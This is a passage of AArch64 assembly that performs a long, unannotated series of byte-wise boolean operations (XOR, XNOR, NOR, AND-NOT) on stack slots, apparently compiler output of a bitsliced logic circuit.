w9, [sp, #1168] eor w8, w8, w9 strb w8, [sp, #1173] ldrb w8, [sp, #478] ldrb w9, [sp, #479] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #480] ldrb w8, [sp, #1136] ldrb w9, [sp, #156] eor w8, w8, w9 strb w8, [sp, #155] ldrb w8, [sp, #220] ldrb w9, [sp, #253] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #658] ldrb w8, [sp, #616] ldrb w9, [sp, #320] eor w8, w8, w9 strb w8, [sp, #450] ldrb w8, [sp, #781] ldrb w9, [sp, #784] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #532] ldrb w8, [sp, #724] ldrb w9, [sp, #204] eor w8, w8, w9 strb w8, [sp, #203] ldrb w8, [sp, #814] ldrb w9, [sp, #630] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #624] ldrb w8, [sp, #57] ldrb w9, [sp, #647] eon w8, w8, w9 strb w8, [sp, #645] ldrb w8, [sp, #554] ldrb w9, [sp, #547] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #896] ldrb w8, [sp, #363] ldrb w9, [sp, #374] eor w8, w8, w9 strb w8, [sp, #371] ldrb w8, [sp, #1102] ldrb w9, [sp, #358] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #357] ldrb w9, [sp, #520] ldrb w8, [sp, #346] bic w8, w8, w9 strb w8, [sp, #347] ldrb w8, [sp, #702] ldrb w9, [sp, #703] and w8, w8, w9 strb w8, [sp, #231] ldrb w8, [sp, #227] ldrb w9, [sp, #233] and w8, w8, w9 strb w8, [sp, #759] ldrb w9, [sp, #766] ldrb w8, [sp, #767] bic w8, w8, w9 strb w8, [sp, #869] ldrh w8, [sp, #1246] asr w8, w8, #14 and w8, w8, #0x1 ldrb w9, [sp, #767] bic w8, w8, w9 strb w8, [sp, #476] ldrb w8, [sp, #1092] ldrb w9, [sp, #521] bic w8, w8, w9 strb w8, [sp, #198] ldrb w9, [sp, #409] ldrb w8, [sp, #533] bic w8, w8, w9 strb w8, [sp, #1178] ldrb w8, [sp, #949] ldrb w9, [sp, #410] bic w8, w8, w9 strb w8, [sp, #67] ldrb w9, [sp, #262] ldrb w8, [sp, #42] bic w8, w8, w9 strb w8, [sp, #43] ldrb w8, [sp, #255] ldrb w9, [sp, #257] bic w8, w8, w9 strb w8, [sp, #793] ldrb w9, [sp, #427] ldrb w8, [sp, #789] bic w8, w8, w9 strb w8, [sp, #788] ldrb w8, [sp, #423] ldrb w9, [sp, #426] bic w8, w8, w9 strb w8, [sp, #768] ldrb w9, [sp, #536] ldrb w8, [sp, #778] bic w8, w8, w9 strb w8, [sp, #779] ldrb w8, [sp, #442] ldrb w9, [sp, #539] bic w8, w8, w9 strb w8, [sp, #807] ldrb w9, [sp, #1174] ldrb w8, [sp, #810] bic w8, w8, w9 strb w8, [sp, #809] ldrb w8, [sp, #843] ldrb w9, [sp, #1173] bic w8, w8, w9 strb w8, [sp, #457] ldrb w9, [sp, #154] ldrb w8, [sp, #480] bic w8, w8, w9 strb w8, [sp, #481] ldrb w8, [sp, #1141] ldrb w9, [sp, #155] bic w8, w8, w9 strb w8, [sp, #192] ldrb w9, [sp, #214] ldrb w8, [sp, #658] bic w8, w8, w9 strb w8, [sp, #144] ldrb w8, [sp, #617] ldrb w9, [sp, #450] bic w8, w8, w9 strb w8, [sp, #528] ldrb w9, [sp, #202] ldrb w8, [sp, #532] bic w8, w8, w9 strb w8, [sp, #123] ldrb w8, [sp, #721] ldrb w9, [sp, #203] bic w8, w8, w9 strb w8, [sp, #1028] ldrb w9, [sp, #620] ldrb w8, [sp, #624] bic w8, w8, w9 strb w8, [sp, #582] ldrb w8, [sp, #393] ldrb w9, [sp, #645] bic w8, w8, w9 strb w8, [sp, #549] ldrb w9, [sp, #555] ldrb w8, [sp, #896] bic w8, w8, w9 strb w8, [sp, #545] ldrb w8, [sp, #372] ldrb w9, [sp, #371] bic w8, w8, w9 strb w8, [sp, #976] ldrb w9, [sp, #356] ldrb w8, [sp, #357] bic w8, w8, w9 strb w8, [sp, #343] ldrb w8, [sp, #521] ldrb w9, [sp, #347] eon w8, w8, w9 strb w8, [sp, #984] ldrb w8, [sp, #476] ldrb w9, [sp, #869] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #756] ldrb w8, [sp, #664] ldrb w9, [sp, #869] eon w8, w8, w9 strb w8, [sp, #662] ldrb w8, [sp, #664] ldrb w9, [sp, #869] and w8, w8, w9 strb w8, [sp, #1034] ldrb w8, [sp, #521] ldrb w9, [sp, #347] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1197] ldrb w8, [sp, #1092] ldrb w9, [sp, #347] bic w8, w8, w9 strb w8, [sp, #199] ldrb w8, [sp, #410] ldrb w9, [sp, #1178] eon w8, w8, w9 strb w8, [sp, #196] ldrb w8, [sp, #410] ldrb w9, [sp, #1178] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #62] ldrb w8, [sp, #949] ldrb w9, [sp, #1178] bic w8, w8, w9 strb w8, [sp, #68] ldrb w8, [sp, #257] ldrb w9, [sp, #43] eon w8, w8, w9 strb w8, [sp, #44] ldrb w8, [sp, #257] ldrb w9, [sp, #43] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #791] ldrb w8, [sp, #255] ldrb w9, [sp, #43] bic w8, w8, w9 strb w8, [sp, #792] ldrb w8, [sp, #426] ldrb w9, [sp, #788] eon w8, w8, w9 strb w8, [sp, #787] ldrb w8, [sp, #426] ldrb w9, [sp, #788] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #774] ldrb w8, [sp, #423] ldrb w9, [sp, #788] bic w8, w8, w9 strb w8, [sp, #769] ldrb w8, [sp, #539] ldrb w9, [sp, #779] eon w8, w8, w9 strb w8, [sp, #770] ldrb w8, [sp, #539] ldrb w9, [sp, #779] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #801] ldrb w8, [sp, #442] ldrb w9, [sp, #779] bic w8, w8, w9 strb w8, [sp, #806] ldrb w8, [sp, #1173] ldrb w9, [sp, #809] eon w8, w8, w9 strb w8, [sp, #805] ldrb w8, [sp, #1173] ldrb w9, [sp, #809] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #467] ldrb w8, [sp, #843] ldrb w9, [sp, #809] bic w8, w8, w9 strb w8, [sp, #461] ldrb w8, [sp, #155] ldrb w9, [sp, #481] eon w8, w8, w9 strb w8, [sp, #482] ldrb w8, [sp, #155] ldrb w9, [sp, #481] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #400] ldrb w8, [sp, #1141] ldrb w9, [sp, #481] bic w8, w8, w9 strb w8, [sp, #468] ldrb w8, [sp, #450] ldrb w9, [sp, #144] eon w8, w8, w9 strb w8, [sp, #164] ldrb w8, [sp, #450] ldrb w9, [sp, #144] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #812] ldrb w8, [sp, #617] ldrb w9, [sp, #144] bic w8, w8, w9 strb w8, [sp, #529] ldrb w8, [sp, #203] ldrb w9, [sp, #123] eon w8, w8, w9 strb w8, [sp, #534] ldrb w8, [sp, #203] ldrb w9, [sp, #123] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1033] ldrb w8, [sp, #721] ldrb w9, [sp, #123] bic w8, w8, w9 strb w8, [sp, #1031] ldrb w8, [sp, #645] ldrb w9, [sp, #582] eon w8, w8, w9 strb w8, [sp, #583] ldrb w8, [sp, #645] ldrb w9, [sp, #582] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #548] ldrb w8, [sp, #393] ldrb w9, [sp, #582] bic w8, w8, w9 strb w8, [sp, #550] ldrb w8, [sp, #372] ldrb w9, [sp, #545] eor w8, w8, w9 strb w8, [sp, #544] ldrb w8, [sp, #372] ldrb w9, [sp, #545] bic w8, w8, w9 strb w8, [sp, #977] ldrb w8, [sp, #371] ldrb w9, [sp, #545] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #345] ldrb w8, [sp, #321] ldrb w9, [sp, #343] eor w8, w8, w9 strb w8, [sp, #340] ldrb w8, [sp, #321] ldrb w9, [sp, #343] bic w8, w8, w9 strb w8, [sp, #37] ldrb w8, [sp, #273] ldrb w9, [sp, #343] bic w8, w8, w9 strb w8, [sp, #659] ldrb w8, [sp, #1092] ldrb w9, [sp, #984] eon w8, w8, w9 strb w8, [sp, #85] ldrb w9, [sp, #757] ldrb w8, [sp, #756] bic w8, w8, w9 strb w8, [sp, #660] ldrb w8, [sp, #199] ldrb w9, [sp, #1197] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #201] ldrb w8, [sp, #949] ldrb w9, [sp, #196] eor w8, w8, w9 strb w8, [sp, #197] ldrb w8, [sp, #68] ldrb w9, [sp, #62] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #63] ldrb w8, [sp, #255] ldrb w9, [sp, #44] eor w8, w8, w9 strb w8, [sp, #45] ldrb w8, [sp, #792] ldrb w9, [sp, #791] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #790] ldrb w8, [sp, #423] ldrb w9, [sp, #787] eor w8, w8, w9 strb w8, [sp, #786] ldrb w8, [sp, #769] ldrb w9, [sp, #774] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #775] ldrb w8, [sp, #442] ldrb w9, [sp, #770] eor w8, w8, w9 strb w8, [sp, #771] ldrb w8, [sp, #806] ldrb w9, [sp, #801] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #800] ldrb w8, [sp, #843] ldrb w9, [sp, #805] eor w8, w8, w9 strb w8, [sp, #804] ldrb w8, [sp, #461] ldrb w9, [sp, #467] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #470] ldrb w8, [sp, #1141] ldrb w9, [sp, #482] eor w8, w8, w9 strb w8, [sp, #455] ldrb w8, [sp, #468] ldrb w9, [sp, #400] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #707] ldrb w8, [sp, #617] ldrb w9, [sp, #164] eor w8, w8, w9 strb w8, [sp, #178] ldrb w8, [sp, #529] ldrb w9, [sp, #812] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #444] ldrb w8, [sp, #721] ldrb w9, [sp, #534] eor w8, w8, w9 strb w8, [sp, #535] ldrb w8, [sp, #1031] ldrb w9, [sp, #1033] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1036] ldrb w8, [sp, #393] ldrb w9, [sp, #583] eor w8, w8, w9 strb w8, [sp, #1025] ldrb w8, [sp, #549] ldrb w9, [sp, #548] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #917] ldrb w8, [sp, #371] ldrb w9, [sp, #544] eon w8, w8, w9 strb w8, [sp, #551] ldrb w8, [sp, #976] ldrb w9, [sp, #977] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #970] ldrb w8, [sp, #273] ldrb w9, [sp, #340] eor w8, w8, w9 strb w8, [sp, #348] ldrb w8, [sp, #28] ldrb w9, [sp, #37] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #38] ldrb w9, [sp, #198] ldrb w8, [sp, #201] bic w8, w8, w9 strb w8, [sp, #951] ldrb w8, [sp, #950] ldrb w9, [sp, #197] bic w8, w8, w9 strb w8, [sp, #59] ldrb w9, [sp, #67] ldrb w8, [sp, #63] bic w8, w8, w9 strb w8, [sp, #64] ldrb w8, [sp, #256] ldrb w9, [sp, #45] bic w8, w8, w9 strb w8, [sp, #1155] ldrb w9, [sp, #793] ldrb w8, [sp, #790] bic w8, w8, w9 strb w8, [sp, #1152] ldrb w8, [sp, #422] ldrb w9, [sp, #786] bic w8, w8, w9 strb w8, [sp, #158] ldrb w9, [sp, #768] ldrb w8, [sp, #775] bic w8, w8, w9 strb w8, [sp, #772] ldrb w8, [sp, #291] ldrb w9, [sp, #771] bic w8, w8, w9 strb w8, [sp, #943] ldrb w9, [sp, #807] ldrb w8, [sp, #800] bic w8, w8, w9 strb w8, [sp, #803] ldrb w8, [sp, #844] ldrb w9, [sp, #804] bic w8, w8, w9 strb w8, [sp, #667] ldrb w9, [sp, #457] ldrb w8, [sp, #470] bic w8, w8, w9 strb w8, [sp, #682] ldrb w8, [sp, #1142] ldrb w9, [sp, #455] bic w8, w8, w9 strb w8, [sp, #462] ldrb w9, [sp, #192] ldrb w8, [sp, #707] bic w8, w8, w9 strb w8, [sp, #900] ldrb w8, [sp, #618] ldrb w9, [sp, #178] bic w8, w8, w9 strb w8, [sp, #589] ldrb w9, [sp, #528] ldrb w8, [sp, #444] bic w8, w8, w9 strb w8, [sp, #588] ldrb w8, [sp, #722] ldrb w9, [sp, #535] bic w8, w8, w9 strb w8, [sp, #212] ldrb w9, [sp, #1028] ldrb w8, [sp, #1036] bic w8, w8, w9 strb w8, [sp, #923] ldrb w8, [sp, #394] ldrb w9, [sp, #1025] bic w8, w8, w9 strb w8, [sp, #503] ldrb w9, [sp, #550] ldrb w8, [sp, #917] bic w8, w8, w9 strb w8, [sp, #918] ldrb w8, [sp, #26] ldrb w9, [sp, #551] bic w8, w8, w9 strb w8, [sp, #967] ldrb w9, [sp, #345] ldrb w8, [sp, #970] bic w8, w8, w9 strb w8, [sp, #971] ldrb w8, [sp, #272] ldrb w9, [sp, #348] bic w8, w8, w9 strb w8, [sp, #36] ldrb w9, [sp, #659] ldrb w8, [sp, #38] bic w8, w8, w9 strb w8, [sp, #175] ldrb w8, [sp, #822] ldrb w9, [sp, #175] bic w8, w8, w9 strb w8, [sp, #780] ldrb w8, [sp, #821] ldrb w9, [sp, #175] bic w8, w8, w9 strb w8, [sp, #754] ldrb w8, [sp, #197] ldrb w9, [sp, #951] eon w8, w8, w9 strb w8, [sp, #1231] ldrb w8, [sp, #197] ldrb w9, [sp, #951] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #61] ldrb w8, [sp, #950] ldrb w9, [sp, #951] bic w8, w8, w9 strb w8, [sp, #60] ldrb w8, [sp, #45] ldrb w9, [sp, #64] eon w8, w8, w9 strb w8, [sp, #65] ldrb w8, [sp, #45] ldrb w9, [sp, #64] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1157] ldrb w8, [sp, #256] ldrb w9, [sp, #64] bic w8, w8, w9 strb w8, [sp, #1156] ldrb w8, [sp, #786] ldrb w9, [sp, #1152] eon w8, w8, w9 strb w8, [sp, #1153] ldrb w8, [sp, #786] ldrb w9, [sp, #1152] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #438] ldrb w8, [sp, #422] ldrb w9, [sp, #1152] bic w8, w8, w9 strb w8, [sp, #439] ldrb w8, [sp, #771] ldrb w9, [sp, #772] eon w8, w8, w9 strb w8, [sp, #773] ldrb w8, [sp, #771] ldrb w9, [sp, #772] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #103] ldrb w8, [sp, #291] ldrb w9, [sp, #772] bic w8, w8, w9 strb w8, [sp, #102] ldrb w8, [sp, #804] ldrb w9, [sp, #803] eon w8, w8, w9 strb w8, [sp, #1069] ldrb w8, [sp, #804] ldrb w9, [sp, #803] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #669] ldrb w8, [sp, #844] ldrb w9, [sp, #803] bic w8, w8, w9 strb w8, [sp, #670] ldrb w8, [sp, #455] ldrb w9, [sp, #682] eon w8, w8, w9 strb w8, [sp, #681] ldrb w8, [sp, #455] ldrb w9, [sp, #682] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #460] ldrb w8, [sp, #1142] ldrb w9, [sp, #682] bic w8, w8, w9 strb w8, [sp, #375] ldrb w8, [sp, #178] ldrb w9, [sp, #900] eon w8, w8, w9 strb w8, [sp, #384] ldrb w8, [sp, #178] ldrb w9, [sp, #900] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #591] ldrb w8, [sp, #618] ldrb w9, [sp, #900] bic w8, w8, w9 strb w8, [sp, #592] ldrb w8, [sp, #535] ldrb w9, [sp, #588] eon w8, w8, w9 strb w8, [sp, #587] ldrb w8, [sp, #535] ldrb w9, [sp, #588] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #174] ldrb w8, [sp, #722] ldrb w9, [sp, #588] bic w8, w8, w9 strb w8, [sp, #211] ldrb w8, [sp, #1025] ldrb w9, [sp, #923] eon w8, w8, w9 strb w8, [sp, #72] ldrb w8, [sp, #1025] ldrb w9, [sp, #923] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #907] ldrb w8, [sp, #394] ldrb w9, [sp, #923] bic w8, w8, w9 strb w8, [sp, #905] ldrb w8, [sp, #551] ldrb w9, [sp, #918] eon w8, w8, w9 strb w8, [sp, #903] ldrb w8, [sp, #551] ldrb w9, [sp, #918] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #968] ldrb w8, [sp, #26] ldrb w9, [sp, #918] bic w8, w8, w9 strb w8, [sp, #966] ldrb w8, [sp, #348] ldrb w9, [sp, #971] eon w8, w8, w9 strb w8, [sp, #972] ldrb w8, [sp, #348] ldrb w9, [sp, #971] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #904] ldrb w8, [sp, #272] ldrb w9, [sp, #971] bic w8, w8, w9 strb w8, [sp, #813] ldrb w8, [sp, #822] ldrb w9, [sp, #175] eor w8, w8, w9 strb w8, [sp, #39] ldrb w8, [sp, #950] ldrb w9, [sp, #1231] eon w8, w8, w9 strb w8, [sp, #652] ldrb w8, [sp, #776] ldrb w9, [sp, #780] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #765] ldrb w8, [sp, #60] ldrb w9, [sp, #61] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #954] ldrb w8, [sp, #256] ldrb w9, [sp, #65] eor w8, w8, w9 strb w8, [sp, #58] ldrb w8, [sp, #1156] ldrb w9, [sp, #1157] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1158] ldrb w8, [sp, #422] ldrb w9, [sp, #1153] eor w8, w8, w9 strb w8, [sp, #1154] ldrb w8, [sp, #439] ldrb w9, [sp, #438] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #441] ldrb w8, [sp, #291] ldrb w9, [sp, #773] eor w8, w8, w9 strb w8, [sp, #160] ldrb w8, [sp, #102] ldrb w9, [sp, #103] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1208] ldrb w8, [sp, #844] ldrb w9, [sp, #1069] eor w8, w8, w9 strb w8, [sp, #312] ldrb w8, [sp, #670] ldrb w9, [sp, #669] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #672] ldrb w8, [sp, #1142] ldrb w9, [sp, #681] eor w8, w8, w9 strb w8, [sp, #668] ldrb w8, [sp, #375] ldrb w9, [sp, #460] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #459] ldrb w8, [sp, #618] ldrb w9, [sp, #384] eor w8, w8, w9 strb w8, [sp, #463] ldrb w8, [sp, #592] ldrb w9, [sp, #591] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #594] ldrb w8, [sp, #722] ldrb w9, [sp, #587] eor w8, w8, w9 strb w8, [sp, #590] ldrb w8, [sp, #211] ldrb w9, [sp, #174] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #170] ldrb w8, [sp, #394] ldrb w9, [sp, #72] eor w8, w8, w9 strb w8, [sp, #91] ldrb w8, [sp, #503] ldrb w9, [sp, #907] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #908] ldrb w8, [sp, #26] ldrb w9, [sp, #903] eor w8, w8, w9 strb w8, [sp, #497] ldrb w8, [sp, #967] ldrb w9, [sp, #968] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #969] ldrb w8, [sp, #272] ldrb w9, [sp, #972] eor w8, w8, w9 strb w8, [sp, #973] ldrb w8, [sp, #36] ldrb w9, [sp, #904] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #493] ldrb w8, [sp, #821] ldrb w9, [sp, #39] eor w8, w8, w9 strb w8, [sp, #33] ldrb w8, [sp, #34] ldrb w9, [sp, #33] bic w8, w8, w9 strb w8, [sp, #23] ldrb w9, [sp, #754] ldrb w8, [sp, #765] bic w8, w8, w9 strb w8, [sp, #21] ldrb w9, [sp, #59] ldrb w8, [sp, #954] bic w8, w8, w9 strb w8, [sp, #953] ldrb w8, [sp, #254] ldrb w9, [sp, #58] bic w8, w8, w9 strb w8, [sp, #252] ldrb w9, [sp, #1155] ldrb w8, [sp, #1158] bic w8, w8, w9 strb w8, [sp, #1159] ldrb w8, [sp, #421] ldrb w9, [sp, #1154] bic w8, w8, w9 strb w8, [sp, #437] ldrb w9, [sp, #158] ldrb w8, [sp, #441] bic w8, w8, w9 strb w8, [sp, #440] ldrb w8, [sp, #490] ldrb w9, [sp, #160] bic w8, w8, w9 strb w8, [sp, #562] ldrb w9, [sp, #943] ldrb w8, [sp, #1208] bic w8, w8, w9 strb w8, [sp, #105] ldrb w8, [sp, #833] ldrb w9, [sp, #312] bic w8, w8, w9 strb w8, [sp, #517] ldrb w9, [sp, #667] ldrb w8, [sp, #672] bic w8, w8, w9 strb w8, [sp, #671] ldrb w8, [sp, #1139] ldrb w9, [sp, #668] bic w8, w8, w9 strb w8, [sp, #1225] ldrb w9, [sp, #462] ldrb w8, [sp, #459] bic w8, w8, w9 strb w8, [sp, #1226] ldrb w8, [sp, #619] ldrb w9, [sp, #463] bic w8, w8, w9 strb w8, [sp, #1213] ldrb w9, [sp, #589] ldrb w8, [sp, #594] bic w8, w8, w9 strb w8, [sp, #593] ldrb w8, [sp, #727] ldrb w9, [sp, #590] bic w8, w8, w9 strb w8, [sp, #183] ldrb w9, [sp, #212] ldrb w8, [sp, #170] bic w8, w8, w9 strb w8, [sp, #167] ldrb w8, [sp, #395] ldrb w9, [sp, #91] bic w8, w8, w9 strb w8, [sp, #1128] ldrb w9, [sp, #905] ldrb w8, [sp, #908] bic w8, w8, w9 strb w8, [sp, #909] ldrb w8, [sp, #31] ldrb w9, [sp, #497] bic w8, w8, w9 strb w8, [sp, #605] ldrb w9, [sp, #966] ldrb w8, [sp, #969] bic w8, w8, w9 strb w8, [sp, #609] ldrb w8, [sp, #275] ldrb w9, [sp, #973] bic w8, w8, w9 strb w8, [sp, #914] ldrb w9, [sp, #813] ldrb w8, [sp, #493] bic w8, w8, w9 strb w8, [sp, #543] ldrb w8, [sp, #34] ldrb w9, [sp, #543] bic w8, w8, w9 strb w8, [sp, #990] ldrb w8, [sp, #33] ldrb w9, [sp, #543] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #24] ldrb w8, [sp, #751] ldrb w9, [sp, #21] eor w8, w8, w9 strb w8, [sp, #1039] ldrb w8, [sp, #751] ldrb w9, [sp, #21] bic w8, w8, w9 strb w8, [sp, #507] ldrb w8, [sp, #755] ldrb w9, [sp, #21] bic w8, w8, w9 strb w8, [sp, #1002] ldrb w8, [sp, #58] ldrb w9, [sp, #953] eon w8, w8, w9 strb w8, [sp, #952] ldrb w8, [sp, #58] ldrb w9, [sp, #953] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #258] ldrb w8, [sp, #254] ldrb w9, [sp, #953] bic w8, w8, w9 strb w8, [sp, #251] ldrb w8, [sp, #1154] ldrb w9, [sp, #1159] eon w8, w8, w9 strb w8, [sp, #1160] ldrb w8, [sp, #1154] ldrb w9, [sp, #1159] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #75] ldrb w8, [sp, #421] ldrb w9, [sp, #1159] bic w8, w8, w9 strb w8, [sp, #436] ldrb w8, [sp, #160] ldrb w9, [sp, #440] eon w8, w8, w9 strb w8, [sp, #176] ldrb w8, [sp, #160] ldrb w9, [sp, #440] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #996] ldrb w8, [sp, #490] ldrb w9, [sp, #440] bic w8, w8, w9 strb w8, [sp, #568] ldrb w8, [sp, #312] ldrb w9, [sp, #105] eon w8, w8, w9 strb w8, [sp, #106] ldrb w8, [sp, #312] ldrb w9, [sp, #105] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1044] ldrb w8, [sp, #833] ldrb w9, [sp, #105] bic w8, w8, w9 strb w8, [sp, #1237] ldrb w8, [sp, #668] ldrb w9, [sp, #671] eon w8, w8, w9 strb w8, [sp, #674] ldrb w8, [sp, #668] ldrb w9, [sp, #671] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1223] ldrb w8, [sp, #1139] ldrb w9, [sp, #671] bic w8, w8, w9 strb w8, [sp, #289] ldrb w8, [sp, #463] ldrb w9, [sp, #1226] eon w8, w8, w9 strb w8, [sp, #1227] ldrb w8, [sp, #463] ldrb w9, [sp, #1226] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #959] ldrb w8, [sp, #619] ldrb w9, [sp, #1226] bic w8, w8, w9 strb w8, [sp, #677] ldrb w8, [sp, #590] ldrb w9, [sp, #593] eon w8, w8, w9 strb w8, [sp, #596] ldrb w8, [sp, #590] ldrb w9, [sp, #593] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #881] ldrb w8, [sp, #727] ldrb w9, [sp, #593] bic w8, w8, w9 strb w8, [sp, #991] ldrb w8, [sp, #91] ldrb w9, [sp, #167] eon w8, w8, w9 strb w8, [sp, #166] ldrb w8, [sp, #91] ldrb w9, [sp, #167] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1127] ldrb w8, [sp, #395] ldrb w9, [sp, #167] bic w8, w8, w9 strb w8, [sp, #1125] ldrb w8, [sp, #497] ldrb w9, [sp, #909] eon w8, w8, w9 strb w8, [sp, #910] ldrb w8, [sp, #497] ldrb w9, [sp, #909] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #604] ldrb w8, [sp, #31] ldrb w9, [sp, #909] bic w8, w8, w9 strb w8, [sp, #606] ldrb w8, [sp, #973] ldrb w9, [sp, #609] eon w8, w8, w9 strb w8, [sp, #608] ldrb w8, [sp, #973] ldrb w9, [sp, #609] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #913] ldrb w8, [sp, #275] ldrb w9, [sp, #609] bic w8, w8, w9 strb w8, [sp, #915] ldrb w8, [sp, #34] ldrb w9, [sp, #543] eor w8, w8, w9 strb w8, [sp, #540] ldrb w8, [sp, #254] ldrb w9, [sp, #952] eon w8, w8, w9 strb w8, [sp, #975] ldrb w8, [sp, #23] ldrb w9, [sp, #990] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #878] ldrb w8, [sp, #755] ldrb w9, [sp, #1039] eor w8, w8, w9 strb w8, [sp, #1038] ldrb w8, [sp, #506] ldrb w9, [sp, #507] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #110] ldrb w8, [sp, #251] ldrb w9, [sp, #258] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #267] ldrb w8, [sp, #421] ldrb w9, [sp, #1160] eor w8, w8, w9 strb w8, [sp, #1161] ldrb w8, [sp, #436] ldrb w9, [sp, #75] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #74] ldrb w8, [sp, #490] ldrb w9, [sp, #176] eor w8, w8, w9 strb w8, [sp, #173] ldrb w8, [sp, #568] ldrb w9, [sp, #996] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #927] ldrb w8, [sp, #833] ldrb w9, [sp, #106] eor w8, w8, w9 strb w8, [sp, #107] ldrb w8, [sp, #1237] ldrb w9, [sp, #1044] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1045] ldrb w8, [sp, #1139] ldrb w9, [sp, #674] eor w8, w8, w9 strb w8, [sp, #673] ldrb w8, [sp, #289] ldrb w9, [sp, #1223] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1220] ldrb w8, [sp, #619] ldrb w9, [sp, #1227] eor w8, w8, w9 strb w8, [sp, #1224] ldrb w8, [sp, #677] ldrb w9, [sp, #959] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #960] ldrb w8, [sp, #727] ldrb w9, [sp, #596] eor w8, w8, w9 strb w8, [sp, #595] ldrb w8, [sp, #991] ldrb w9, [sp, #881] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1148] ldrb w8, [sp, #395] ldrb w9, [sp, #166] eor w8, w8, w9 strb w8, [sp, #185] ldrb w8, [sp, #1128] ldrb w9, [sp, #1127] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1130] ldrb w8, [sp, #31] ldrb w9, [sp, #910] eor w8, w8, w9 strb w8, [sp, #1126] ldrb w8, [sp, #605] ldrb w9, [sp, #604] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #603] ldrb w8, [sp, #275] ldrb w9, [sp, #608] eor w8, w8, w9 strb w8, [sp, #607] ldrb w8, [sp, #914] ldrb w9, [sp, #913] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #912] ldrb w8, [sp, #33] ldrb w9, [sp, #540] eon w8, w8, w9 strb w8, [sp, #916] ldrb w8, [sp, #10] ldrb w9, [sp, #916] bic w8, w8, w9 strb w8, [sp, #1081] ldrb w9, [sp, #24] ldrb w8, [sp, #878] bic w8, w8, w9 strb w8, [sp, #11] ldrb w8, [sp, #141] ldrb w9, [sp, #1038] bic w8, w8, w9 strb w8, [sp, #538] ldrb w9, [sp, #1002] ldrb w8, [sp, #110] bic w8, w8, w9 strb w8, [sp, #124] ldrb w9, [sp, #252] ldrb w8, [sp, #267] bic w8, w8, w9 strb w8, [sp, #260] ldrb w8, [sp, #420] ldrb w9, [sp, #1161] bic w8, w8, w9 strb w8, [sp, #83] ldrb w9, [sp, #437] ldrb w8, [sp, #74] bic w8, w8, w9 strb w8, [sp, #86] ldrb w8, [sp, #305] ldrb w9, [sp, #173] bic w8, w8, w9 strb w8, [sp, #697] ldrb w9, [sp, #562] ldrb w8, [sp, #927] bic w8, w8, w9 strb w8, [sp, #963] ldrb w8, [sp, #834] ldrb w9, [sp, #107] bic 